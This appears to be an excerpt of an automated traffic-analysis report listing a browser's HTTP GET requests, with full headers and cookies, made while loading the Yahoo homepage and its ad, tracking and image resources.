Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: v-ca9s256c5j.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /yahooweb-network/pmk-20220605.1.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.yahoo.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: rwf9bb5hj.wc.06yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG-EBWcCELI7p8b_8SP-J1Jn4TZ_Dl4FEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAovr96DIfHM5ws374Dhn30c
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: ral248z7j.wc.06yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBHCEBWcCEJAFb-Xz2Gpkh1Qme8cKGPQFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAm3asNw30I0P7ooAmsYfe_c
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: dns-aup3nb5p0.sombrero.yahoo.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /noquery/pixel.gif?rand=xkme2lc4o HTTP/1.1Host: cerebro.edna.yahoo.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cx/pv/perf-vitals_3.3.0.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-start-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-result-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /yahooweb-network/pmk-20220605.1.js HTTP/1.1Host: pm-widget.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-error-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /pv/static/misc/voice-close-202105050733.wav HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: audioReferer: https://www.yahoo.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/MOSTLY_SUNNY.svg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /caas/content/article/?uuid=12dfba99-00cf-4f01-ac78-06d6c0d07524,0468abf9-ac9d-470b-a17a-0abbf27eb007,1072b278-f788-45ae-9e2f-e1732f12bcde,1b31ce0a-38da-40ff-8bf8-df7bfd4c3b89,4d305d2a-95ac-41bb-b482-7f09ed368552,637e8837-4314-4f37-8ae7-414f1cd9b94f&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=rocket_GA_desk_test-3-v1,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1fkbtbdjgb12s HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&rn=6.422501612766903 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o
Source: global trafficHTTP traffic detected: GET /floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js HTTP/1.1Host: wnsrvbjmeprtfrnfx.ay.deliveryConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pixel.gif HTTP/1.1Host: v-ca9s256c5j.wc.yahoodns.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /cx/pv/perf-vitals_3.3.0.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/SUNNY.svg HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/google-topics-api.20241006-3-RELEASE.es6.js HTTP/1.1Host: cdn.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cv/apiv2/yahoo_weather_web/accuweather-horizontal.png HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=2&rn=6.422501612766903 HTTP/1.1Host: www.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; trc_cookie_storage=taboola%2520global%253Auser-id%3D2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/MOSTLY_SUNNY.svg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern-a4f31e10ae.chunk.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/Dk0BYpDu_E2Bh.3tzsofkQ--~B/Zmk9c3RyaW07aD00MDg7dz03MjA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/0368e4b0-81be-11ef-9f53-7a1ada451b47.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&rn=6.422501612766903 HTTP/1.1Host: www.yahoo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yhome-viper=1; A1=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A3=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; A1S=d=AQABBFyEBWcCECwE3_aipaRunGU8WfoY4GsFEgEBAQHVBmcPZ9xS0iMA_eMAAA&S=AQAAAhO9NiTLyx3fDDQ91K20Q1o; trc_cookie_storage=taboola%2520global%253Auser-id%3D2491f7ac-bac0-439b-ae60-c06d9130e657-tuctdff09e9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/sirEetD8VsuRx6m97CC1UA--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/ff4bcc10-81a1-11ef-adf9-70085f4f49b1.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /libtrc/google-topics-api.20241006-3-RELEASE.es6.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cs/W3sibiI6InZwaXhpZWIiLCJtIjpbMTU1MDkuNjAwMDAwMDAwMDA2LDAsMCwxNTUwOS42MDAwMDAwMDAwMDYsMTg4NjEuNjAwMDAwMDAwMDA2LDE4ODc2Ljc5OTk5OTk5OTk5LDE4ODc2Ljc5OTk5OTk5OTk5LDE4ODc3Ljg5OTk5OTk5OTk5NCwxOTQ5NS41LDE5NDk1LjcwMDAwMDAwMDAxLDE5NjY0LDE5NjY0Ljc5OTk5OTk5OTk5XSwiciI6MCwicyI6MTcyODQxNDgyNTM5NSwiZSI6MTcyODQxNDgyOTU1MywicSI6ImltYWdlIiwicCI6ImhvbWVwYWdlIiwiZCI6ImRlc2t0b3AiLCJsIjoiZW4tVVMiLCJiIjoiYndsbGdoa2ZmNSJ9XQ== HTTP/1.1Host: ybar-bwllghkff5report.wc.yahoodns.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBG6EBWcCEOtWv2vYPB4i7u8gvLT-X-kFEgEBAQHVBmcPZ9xH0iMA_eMAAA&S=AQAAAnSO_dQj16YYmcCzyCeGlyE
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/2NW2CfWeNKI57cwpeOIBFw--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-01/bedd8160-ab13-11ee-bbab-76c907c64d8d.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/SUNNY.svg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/hQF2Z_SG3YkVEr2UtvFbGg--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/a85cf280-84b7-11ef-84ef-7853959e0cfd.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/EqZJAXlb0unBeA1.EInqPw--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/277cf7d0-84f5-11ef-be7d-f26d36bbe250.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cv/apiv2/yahoo_weather_web/accuweather-horizontal.png HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /floorPrice/wnsrvBJmEPrTfrnFX/js/floorPrice/linreg.min.js HTTP/1.1Host: wnsrvbjmeprtfrnfx.ay.deliveryConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern-a4f31e10ae.chunk.js HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /uu/api/res/1.2/hg3dbAi3sDeZI58WOrthCQ--~B/Zmk9c3RyaW07aD0xNTY7dz0zMDA7YXBwaWQ9eXRhY2h5b24-/https://s.yimg.com/os/creatr-uploaded-images/2024-10/f77ecae0-85a3-11ef-acff-e1584e8df32f.cf.webp HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
